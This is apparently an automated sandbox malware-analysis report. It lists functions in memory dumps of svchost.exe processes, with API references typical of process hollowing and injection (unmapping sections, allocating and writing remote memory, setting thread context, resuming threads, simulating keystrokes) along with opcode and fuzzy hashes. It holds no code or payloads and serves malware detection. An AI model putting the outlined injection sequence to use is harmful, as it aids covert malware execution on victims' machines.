Function 00007FFB4AF9CA47 Relevance: 1.7, APIs: 1, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFB4AF9E47B

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 5ff3e8add1952f39c230e0f4012ab61a5a7b5104b57b4dbe0ab8312efba3fbb6
Instruction ID: 00bd2e39e454cb971e1a754d7c111ed43283a06f1da5567b4cabb31f5f361ed3
Opcode Fuzzy Hash: 5ff3e8add1952f39c230e0f4012ab61a5a7b5104b57b4dbe0ab8312efba3fbb6
Instruction Fuzzy Hash: 93414BF2A0C2598FDB15EF6CE8A62EA7BE8EF41320F1441BBD049C7143E93464478791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9CA83 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7901a7142ca0a05b97a27b232665c2783bb5cc6290ab8070a3f4bc9fb0614022
Instruction ID: f77d9daee0da5db1d98cb154fc0e2994fdacb3e2996f08e7c92fced6f889b107
Opcode Fuzzy Hash: 7901a7142ca0a05b97a27b232665c2783bb5cc6290ab8070a3f4bc9fb0614022
Instruction Fuzzy Hash: AD4137B2A0C6498FEB54EF6CD8966E97BE4EF55320F0441BBD049C7143EA34A8078790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E3DA Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFB4AF9E47B

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 1a6f52f4178e020aa46e93d7b7969e85a5e7b0643c9586950e3e97dcabe22380
Instruction ID: 5a59ca5b8271820ac20edf2a957f606ed509bfd7bb92fb4b21dd923e904ba253
Opcode Fuzzy Hash: 1a6f52f4178e020aa46e93d7b7969e85a5e7b0643c9586950e3e97dcabe22380
Instruction Fuzzy Hash: 0521D27190CA4C8FDB58DF6CD88A7E9BBF4EB56320F0441AFD049C3252CA70A456CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E5DD Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 271
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE ref: 00007FFB4AF9E7D6

Strings

WL_H, xrefs: 00007FFB4AF9E68E

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: AllocVirtual
String ID: WL_H
API String ID: 4275171209-1262097562
Opcode ID: 03f0d5d79501d211fee9551095ac120d9bc0bd576cd9d1b9b566bff4d193e801
Instruction ID: b2a5d38cbd5dba87d68bdeb0320d6e97154d54a645c90e55a2d778db8aaca94d
Opcode Fuzzy Hash: 03f0d5d79501d211fee9551095ac120d9bc0bd576cd9d1b9b566bff4d193e801
Instruction Fuzzy Hash: 9571797190CB498FE719EF38D8965E5BBF4FF95310F1401BED08AC3292DA24A846C782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B06026B Relevance: 2.1, Strings: 1, Instructions: 804
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFB4B060786

Memory Dump Source

Source File: 0000000B.00000002.1924090376.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4b060000_svchost.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 74a726394f91e04ebcdcd5e9a9248c8fceb483cd9951dee483101d0059dd7db3
Instruction ID: 7dea1ba0b1595c2df2e35671be136407dc27759dadf09d80ce63864ad5419713
Opcode Fuzzy Hash: 74a726394f91e04ebcdcd5e9a9248c8fceb483cd9951dee483101d0059dd7db3
Instruction Fuzzy Hash: 62422BB180DB8A4FE756EF3CC8955A47BE1FF95301F1881FDD189CB2A2E9246806C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E175 Relevance: 1.7, APIs: 1, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaa985b0b469a178082c7f4a72cbccd1c90448e2f0ab7dc543272b17809781f6
Instruction ID: 727fd5440a1cc09de4afc695c52ad36257004b56e8f108f6e816ec938051bd15
Opcode Fuzzy Hash: aaa985b0b469a178082c7f4a72cbccd1c90448e2f0ab7dc543272b17809781f6
Instruction Fuzzy Hash: 3751E17180CB4C8FDB59DF6CD4546AABBF0EB99310F1442AFE489D3291DB34A8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E1B9 Relevance: 1.7, APIs: 1, Instructions: 172
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00007FFB4AF9E2E1

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 21d145a76e5c46facbd82b3c461ff32272c404b528ef4352ac3bfc12c000e002
Instruction ID: f035a0fde19d374f5abcde7027f3b2bc464cdc62bfb769ec56460c15484efde6
Opcode Fuzzy Hash: 21d145a76e5c46facbd82b3c461ff32272c404b528ef4352ac3bfc12c000e002
Instruction Fuzzy Hash: CB51AD7180CB5C8FDB59DF5CD8447A9BBF1EBA9321F0442AFE489D3291DB34A8458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8303A Relevance: 1.6, APIs: 1, Instructions: 137
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFB4AF83111

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af80000_svchost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9efb153da3038bd5ecfcf7a27e5445b55e4c771c07f929c22038b4295aada56c
Instruction ID: b5ab1516b6334f06b7d75eb7ff28f89514c7a8b25dbc5953ac57f277cc013e8c
Opcode Fuzzy Hash: 9efb153da3038bd5ecfcf7a27e5445b55e4c771c07f929c22038b4295aada56c
Instruction Fuzzy Hash: FE41F53090CB884FDB19DBA898466E9BFF1EF56321F0402AFD049C31A3CB646456C795

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9EF86 Relevance: 1.6, APIs: 1, Instructions: 134injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE ref: 00007FFB4AF9F05A

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 61dd414a5340cdc675af230689dffa84cdb788fefe33aa6f028db36aeeb921bc
Instruction ID: 34be90c5aced5ce688adf3e03467d17467abbe82c4e9e21a5367e72df1640b8a
Opcode Fuzzy Hash: 61dd414a5340cdc675af230689dffa84cdb788fefe33aa6f028db36aeeb921bc
Instruction Fuzzy Hash: 5A41E37190CB488FDB18DF58D8856F97BF4FB99311F0042AFE089D3292CA74A805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9E92D Relevance: 1.6, APIs: 1, Instructions: 128injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE ref: 00007FFB4AF9E9F0

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 837ea3987f010ba7c3c8ba5baa0d51aba1c5c173e1ef6d3b5a2cf3ccadac1929
Instruction ID: 343f6fec6c85f91aa988251858938a14c8fef08d76be4d1fc24477c43b1528c4
Opcode Fuzzy Hash: 837ea3987f010ba7c3c8ba5baa0d51aba1c5c173e1ef6d3b5a2cf3ccadac1929
Instruction Fuzzy Hash: B631187190CB888FDB19DF5CD8466F97BF5EB9A311F04426FE089C3292CA749846C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9F25A Relevance: 1.6, APIs: 1, Instructions: 122threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 00007FFB4AF9F2F5

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d3dbc35e196e45e68d6a53cba0e8d30e1fe5cdb2c38849d0a307135ee0ca9c94
Instruction ID: d07f77e6558c9170432adc035be4689518dac2e75d8cb95cd1b7c02a0adc4a27
Opcode Fuzzy Hash: d3dbc35e196e45e68d6a53cba0e8d30e1fe5cdb2c38849d0a307135ee0ca9c94
Instruction Fuzzy Hash: 1331057190CA4C8FDB58DF68D895BF9BBF4EF95320F0441AFD049C3292DA65A816CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF98259 Relevance: 1.6, APIs: 1, Instructions: 119memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFB4AF98301

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18eb037257c64365a784fc1ab91ddfdd8b22a3e620dd20080b46bcd78eeee5b9
Instruction ID: b7ac8994e0aecb17eab0efaea183a9112e834003635c5653136aee19ca93f4d3
Opcode Fuzzy Hash: 18eb037257c64365a784fc1ab91ddfdd8b22a3e620dd20080b46bcd78eeee5b9
Instruction Fuzzy Hash: AB31D27090CA5C8FDB18DFA8D8466F9BBF5EB95721F04426FE049C3252DB70A856CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9EDF5 Relevance: 1.6, APIs: 1, Instructions: 102threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNELBASE ref: 00007FFB4AF9EE8B

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 38fe85b4340b40f92713a61c18ac6e1c19dfff8cdaf36ce56f567acf80cf0e76
Instruction ID: f33047b69e5e25e1390e6e5df2e638fd9fbaf48e8bdd823d7385eb381a43ea8d
Opcode Fuzzy Hash: 38fe85b4340b40f92713a61c18ac6e1c19dfff8cdaf36ce56f567acf80cf0e76
Instruction Fuzzy Hash: F831E27090C64C8FDB58EF6CD8856FABBE4EB65311F0441AFD049C3192DA70A855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF8090D Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FreeConsole.KERNELBASE ref: 00007FFB4AF8098F

Memory Dump Source

Source File: 0000000B.00000002.1923035679.00007FFB4AF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4af80000_svchost.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 40e352293348c549cb847f043ef37b1d8f8f8312766f3139040b9fd97dda10c9
Instruction ID: cb13308d89e1da299588b254200e6fbbe8b9e68f96c85f5212e186a6ccde6045
Opcode Fuzzy Hash: 40e352293348c549cb847f043ef37b1d8f8f8312766f3139040b9fd97dda10c9
Instruction Fuzzy Hash: CC21837190CB4C8FDB69DF58D84AAEABBF0EB55310F00416FD049C3652DB756809CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B061269 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1924090376.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffb4b060000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 326e800c30c9149a29067c75fb0599d341323c60787de19214a4bd274da0c0d6
Instruction ID: cb09afa57830cbac6c5f500583448c1b9316e10569bc1d4e28d3368541f023a5
Opcode Fuzzy Hash: 326e800c30c9149a29067c75fb0599d341323c60787de19214a4bd274da0c0d6
Instruction Fuzzy Hash: 6FD156B290EBC64FE756AF3CD8561A47FE1EF56201B0841FFD189C72E3D91868168392

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exePID: 5572, Parent PID: 4084COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFB4AF9BEE1 Relevance: 2.6, Strings: 1, Instructions: 1374COMMON

Download Yara Rule

Strings

#uL, xrefs: 00007FFB4AF9C9D7

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID: #uL
API String ID: 0-1014397383
Opcode ID: 1ed0db31cf819d34c7c5a758be7087f24a2f961653a2e888169741b45c5685ff
Instruction ID: c754c0e0d54b38607498197d482b13c922be29dc4baa756f3e84f7876c41de7a
Opcode Fuzzy Hash: 1ed0db31cf819d34c7c5a758be7087f24a2f961653a2e888169741b45c5685ff
Instruction Fuzzy Hash: FEA214B191CA498FE359EF38C4A44A5B7F5FF95301B2445FED08AC72E6EA35A842C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9EE79 Relevance: 1.9, Strings: 1, Instructions: 668
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

OL_H, xrefs: 00007FFB4AF9EE8E

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID: OL_H
API String ID: 0-3734465514
Opcode ID: 8780dbd23facdb23e3127aea44d07facadff4389f05320ede1c4b0e123a14027
Instruction ID: 37960301f149beda599124789813f5e5a94f6027b7465afcfa134df033912245
Opcode Fuzzy Hash: 8780dbd23facdb23e3127aea44d07facadff4389f05320ede1c4b0e123a14027
Instruction Fuzzy Hash: A6223471A1CB464FD319EF38C4910A1B7E6FBD5305B2486BEE486C72D6EA34E846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF98988 Relevance: 1.7, Instructions: 1686COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5085c0d4e2f39f1aaca816052e758309c9d5aba23ef3a66d25169cb76bbb41fb
Instruction ID: 03809d091c8fb1fd6d9892608ab357f31488e86772adffc02d600d485ddedf75
Opcode Fuzzy Hash: 5085c0d4e2f39f1aaca816052e758309c9d5aba23ef3a66d25169cb76bbb41fb
Instruction Fuzzy Hash: 62C2D1B1A0DA498FEB99EF28D4956B877E5FF55300F1500FAD44EC72E2DE28AC418B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AFABC2C Relevance: 1.6, APIs: 1, Instructions: 115
keyboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

keybd_event.USER32 ref: 00007FFB4AFABCD8

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AFA9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFA9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4afa9000_svchost.jbxd

Similarity

API ID: keybd_event
String ID:
API String ID: 2665452162-0
Opcode ID: dd89b534788db069128e990c9f1e5726f863219a264eb3fd932b651d9fa72f7e
Instruction ID: 45c77e7203ee0af52987962713f6db63e09a2ad68d6aec40e4f522c24d8c7eba
Opcode Fuzzy Hash: dd89b534788db069128e990c9f1e5726f863219a264eb3fd932b651d9fa72f7e
Instruction Fuzzy Hash: D531097191CB488FDB19EF68D84AAF8BBF4FB56311F10026FD089D3192DA746806CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AFA052A Relevance: 1.1, Instructions: 1100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b19c8d56b23c33777f80618f916f93aac96f42af9a329f9a01ce7f65686f03f
Instruction ID: 33c6fc4422ec57c12593764463a3bd9eef73e1b999366ab15322a3d525676c2d
Opcode Fuzzy Hash: 1b19c8d56b23c33777f80618f916f93aac96f42af9a329f9a01ce7f65686f03f
Instruction Fuzzy Hash: B1725471A1CB4A4FE359EF38D4905B177E5EF95300B2045FEE88AC72D6DE28A846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF98980 Relevance: .9, Instructions: 924
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2040e16709c65b3a80ab552d29e3b8e0c26c9612272ae8b1a5e3cceb70e2cc
Instruction ID: 4b06a56f8add8984b2fc9026fcd31b30091a068206bec9a0ea2308b22e7d8264
Opcode Fuzzy Hash: 9d2040e16709c65b3a80ab552d29e3b8e0c26c9612272ae8b1a5e3cceb70e2cc
Instruction Fuzzy Hash: 9E52A770A1CA098FDB68EF38D4A5A7977E9EF59341F2401BDE44EC72D2DE24AC428741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9BB00 Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7015a53f38828299e28ce78b402579dc8c717c12b50a98e0f28837290a037b08
Instruction ID: e7d41e8f94b6473bdc5b7d952ae8a3c3c2328fe124a27b9b523810c7dde7d940
Opcode Fuzzy Hash: 7015a53f38828299e28ce78b402579dc8c717c12b50a98e0f28837290a037b08
Instruction Fuzzy Hash: 2BB1557091CB864FE31DDF39C4A50B1B7E6EFD5311B2486BED4CAC72E5CA28A4468781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B07026B Relevance: 2.1, Strings: 1, Instructions: 837
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFB4B070786

Memory Dump Source

Source File: 00000010.00000002.1826904128.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4b070000_svchost.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: a2f081419afba247112d5d07b1b20a29569dd75765d48daef737c4741a882ec8
Instruction ID: 2738ccb98d6ad806fab58bc1a6335d83339ff88d597cd7c69f69825ac01d9160
Opcode Fuzzy Hash: a2f081419afba247112d5d07b1b20a29569dd75765d48daef737c4741a882ec8
Instruction Fuzzy Hash: 69422AB280D78A4FE755EF78C8555A4BFE0FF55301F1882FAD1C9CB2A2E9246846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9F8F0 Relevance: 1.9, Strings: 1, Instructions: 611
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DL_H, xrefs: 00007FFB4AF9F98E

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID: DL_H
API String ID: 0-160885995
Opcode ID: 3a8114637ed6689e666525d8aac43d3cedce54e32f5fe13c8894280a528c4027
Instruction ID: 0c8a28de0e4964d13601f0494a83baf8b82c542583878d2569389d8ebdd443b6
Opcode Fuzzy Hash: 3a8114637ed6689e666525d8aac43d3cedce54e32f5fe13c8894280a528c4027
Instruction Fuzzy Hash: 1B023471A0CA4A4FD759EF38C4A55B577F5EF99300B1401BEE44EC32E2DE28A846C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9303A Relevance: 1.6, APIs: 1, Instructions: 137
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFB4AF93111

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af90000_svchost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 448ff43927b38dac9217cfe6aa9a6ff4f0b4914740f1b17fd97e2d7834a1d693
Instruction ID: 75bae4b9eb70d1aad5838978d855e595edf3a26aa72ec7593b645d173f43d636
Opcode Fuzzy Hash: 448ff43927b38dac9217cfe6aa9a6ff4f0b4914740f1b17fd97e2d7834a1d693
Instruction Fuzzy Hash: C141243090CB888FDB19DFA898466E9BFF4EF56321F0402AFD049C31A3CB646856C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9090D Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FFB4AF9098F

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af90000_svchost.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 65c3eac95036275f504af04dd6febcc66399543799404af745f54b8099640256
Instruction ID: 12b2c9df1aa45bb61b6b858e17861fb2409515955619ec32d88671fa67b1cb0f
Opcode Fuzzy Hash: 65c3eac95036275f504af04dd6febcc66399543799404af745f54b8099640256
Instruction Fuzzy Hash: D0219F7190CB4C8FEB68DF58D88AAEABBF0EB59310F00416ED049C3252DB71A805CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF988FA Relevance: 1.3, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

L_^, xrefs: 00007FFB4AF988FA

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID: L_^
API String ID: 0-925995230
Opcode ID: 6b1f5315b743f8204b3f638dddcc391f35e34d1b5413cfc5c443ba66e7a13254
Instruction ID: 8bcfdc068870efcce09491110d7abd65001611f7a8dfa85171e1362bd7268c33
Opcode Fuzzy Hash: 6b1f5315b743f8204b3f638dddcc391f35e34d1b5413cfc5c443ba66e7a13254
Instruction Fuzzy Hash: 9721F5F190D6418FD756BF38D0E51F537F4EF5532872805BAE48ACA1A3EE3894428741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9DDC0 Relevance: .7, Instructions: 740COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac72e13453bd36c5c4c1722212e702e8debbed43bbad6311b8684cf03282291f
Instruction ID: c1827e5c28967bde68bd176660ef8830399d45d7fc2b0bc12edc3dc496fa11fb
Opcode Fuzzy Hash: ac72e13453bd36c5c4c1722212e702e8debbed43bbad6311b8684cf03282291f
Instruction Fuzzy Hash: 9D224BB2E1DB464FE7A9EE38C4A557677E9EF94310B2401FED48DC72C2DD18A8068381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF98FF0 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 799fd7724c43e4a415afba33cfbb85c6141ed6059e0f205cd48525ee8f2ff3b0
Instruction ID: dbde137dc37ec493bd62951a723d2a0d0d9acccb325ba116bbc1359450e8e03a
Opcode Fuzzy Hash: 799fd7724c43e4a415afba33cfbb85c6141ed6059e0f205cd48525ee8f2ff3b0
Instruction Fuzzy Hash: FA1246B1A0DA8A4FF794EE38D8566E87BE1FF99310F1401F9D44DC72D2DE2868068741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF972C0 Relevance: .4, Instructions: 429COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e6e0e610d5ce7165d4aea74a507e384c6b6dfef7024d1a9c88a66631c7a321e
Instruction ID: e13771f9cf10681b5a36dcafe8f9d5c6ddecd669c9a1a961414095ab104bf5e9
Opcode Fuzzy Hash: 9e6e0e610d5ce7165d4aea74a507e384c6b6dfef7024d1a9c88a66631c7a321e
Instruction Fuzzy Hash: C8C155B190DE068BEB5CAE38C5A15B9B7E9EF95310B2401FDD48FD74C2DD28B8468780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF96B43 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

